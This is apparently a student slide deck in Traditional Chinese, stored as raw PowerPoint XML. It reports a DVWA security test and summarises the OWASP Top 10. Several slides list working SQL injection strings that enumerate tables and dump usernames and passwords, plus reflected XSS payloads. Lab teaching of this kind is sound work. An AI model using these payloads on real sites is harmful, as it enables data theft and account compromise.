        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="913820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51FB40-2423-46FA-860E-E6D927EC5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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’or’1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，查詢成功</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL Injection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23F4247-139E-4AB0-BCAD-178FEF52E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133600"/>
            <a:ext cx="8911687" cy="4189562"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="788306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28E9A-E36B-4147-B2CA-A001BEDB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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>‘union select database(),2#</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢資料庫  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL Injection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C82EC8A-CC19-4DEB-A0B3-7C99AC7D7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124972"/>
            <a:ext cx="8911687" cy="4232695"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2396841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AE4665-23A1-4F23-BB8A-29CD01953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1800" dirty="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>‘union select table_name,2 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>=0x64767761#</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查詢表名   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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BBAF138-27A2-419C-AD7C-EA3ADBC4B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6" y="2133599"/>
            <a:ext cx="8845700" cy="4198189"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="120636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921655-857A-4717-9978-1FD37C33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1800" dirty="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>‘union select column_name,2 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>=0x7573657273#</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下的列名  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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D6DD12A-4812-47F3-9023-CB3B1037F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133600"/>
            <a:ext cx="8911686" cy="4100290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4226541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B262DA-4558-46BC-96BC-2869C2BD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輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>‘union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>user,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> from users# </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的資料   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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64E1054-024E-470E-AE78-007CD4DF8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133599"/>
            <a:ext cx="8733557" cy="4284453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CA0456E-2FDD-4686-A937-D5904190A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﻿</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="817648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295338-D58D-4B6A-9F28-D0204B0AD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輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’or’12’=’12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>user  SQL Injection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8EAB41C-FB4F-4504-A2E7-6CCBDC8D0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133599"/>
            <a:ext cx="8975097" cy="4249947"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3378486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3F4174-7DCF-4E7A-A867-0D243931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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1‘ or 1=1 order by 2 #</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢語言中中的字段數 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL Injection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45BFC65-EF5C-4AE3-8E65-B4F3B1F41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133600"/>
            <a:ext cx="8911687" cy="4100290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1052821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4B18F3-84FC-4583-A2E3-0B7B6204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1800" dirty="0"/>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>1' union select 1,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>=database() #</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>獲取表格中的標題</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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B676167-6BD8-460E-A434-252DC039F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936" y="2133600"/>
            <a:ext cx="8557404" cy="4100290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2512639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0B1848-E334-476C-9FAD-A1ECDDBB0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Injection Flaws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CF9FD7-6892-45FE-8B06-69C2CFF68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在網路應用程式中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>弱點很常見，尤其在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。而 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>發生，通常是使用者提供的資料傳輸到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>， 被當成指令或是查詢。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>攻擊者就能用惡意的資料欺騙 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，達到執行指令或竄改資料目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379738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88F754-3F5B-4E39-998E-CF9D270C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1600" dirty="0"/>
              <a:t>1‘ or 1=1 union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>user_id,first_name,last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(password) from users #</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>下載數據庫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83E3777-DB3F-4B2F-93E9-A4764D0A7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099094"/>
            <a:ext cx="8733558" cy="3778250"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3059231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98364A-8CE6-4FB4-B4A1-B0D1449DE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&lt;script&gt;alert(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/)&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）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51B7165-289E-4321-88B7-D30A084F6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133599"/>
            <a:ext cx="8911687" cy="3948023"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字方塊 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8986058" y="624110"/>
            <a:ext cx="3025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代碼直接引用了名稱參數，並沒有任何的過濾與檢查，存在明顯的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>突破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06941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28784D-DC17-4951-977B-153FA62E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輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>=alert(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>/)&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入惡意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代碼</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等級</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）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AB50341-ED49-4804-B056-1A483A578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133600"/>
            <a:ext cx="8911686" cy="4025660"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1594352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87440F-8A04-48F5-A201-59094570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A26E05-F97E-4B57-A32D-E280B7112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https://www.gss.com.tw/eis/168-eis89/1787-eis89-6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.ithome.com.tw/news/137464</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/articles/web/123779.html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7942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18407C-48A6-4625-B703-BEED80A52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Broken Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>失效的身份驗證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7B5E89-3A13-4916-A4B4-3E9CB089D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攻擊者透過錯誤的使用者應用程式身份認證和會話管理功能，破解密碼、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Session Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，或利用其它開發漏洞，暫時性或永久性冒充用戶身份。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3262196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7D16B2-2AF2-4783-92AA-801162348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Sensitive Data Exposure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>敏感資料外漏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513129-FC92-4A4F-BA96-7E07A4BB0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許多 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>應用系統和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>都無法正確保護敏感資訊，例如財務資料、醫療資料和個人資料等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>攻擊者可透過竊取或修改未加密數據，實施信用卡詐騙、身份盜取或其他犯罪行為。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>未加密的敏感資料容易受到破壞，因此，使用者需要對敏感資料加密，包括傳輸過程中的資料、儲存的資料及瀏覽器的交換資料。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3888126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443B3B-1012-421E-8ED4-10B2DC1E7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XML External Entities (XXE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>外部處理器漏洞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13BDC8-0F3B-41CA-A001-975C93D3F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許多早期或設定錯誤的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>處理器，沒做好相關權限保護，造成機密資料外洩風險產生。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>攻擊者可利用以 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為基礎的應用程式或網路服務，竊取使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>呼叫的內部文件、共享文件和掃描連接埠，藉此監聽內部網路、執行遠端程式和實施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DDoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>攻擊。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3472795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53C62B-C949-4095-AD4B-4ED2891F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Broken Access Control  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>存取控制的破解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FDB4A4-9CE3-4A4F-96A2-80F7653D6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合併易混淆的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A4 Insecure Direct Object Reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A7 Broken Authentication and Session Management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為無效的存取控管。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>建議處理檔案或敏感性資料時，需嚴格進行監控及身份權限驗證，降低駭客利用漏洞存取未經驗證或授權的功能察看敏感資料、修改數據和提升存取權限等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328156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0C0B6-CB55-46FA-873D-3C983141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Security Misconﬁguration  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不安全的組態設定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35E270-0A03-449E-BA1D-AE9459AFE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應用系統的組態設定常被忽略，而組態設定通常是由於不安全的預設值、錯誤的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>標頭配置及包含敏感信息的詳細錯誤信息造成。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>因此使用者不僅需要對所有的操作系統、框架、函式庫和應用程序進行安全的設定，並必須即時修補和升級它們。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273360047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1294</TotalTime>
  <Words>1391</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>85</Paragraphs>
  <Slides>43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47" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>絲縷</vt:lpstr>
      <vt:lpstr>網站漏洞分析與實務 DVWA網站安全測試報告</vt:lpstr>
      <vt:lpstr>目錄</vt:lpstr>
      <vt:lpstr>OWASP 十大網路安全弱點 </vt:lpstr>
      <vt:lpstr> Injection Flaws</vt:lpstr>
      <vt:lpstr>Broken Authentication 失效的身份驗證 </vt:lpstr>
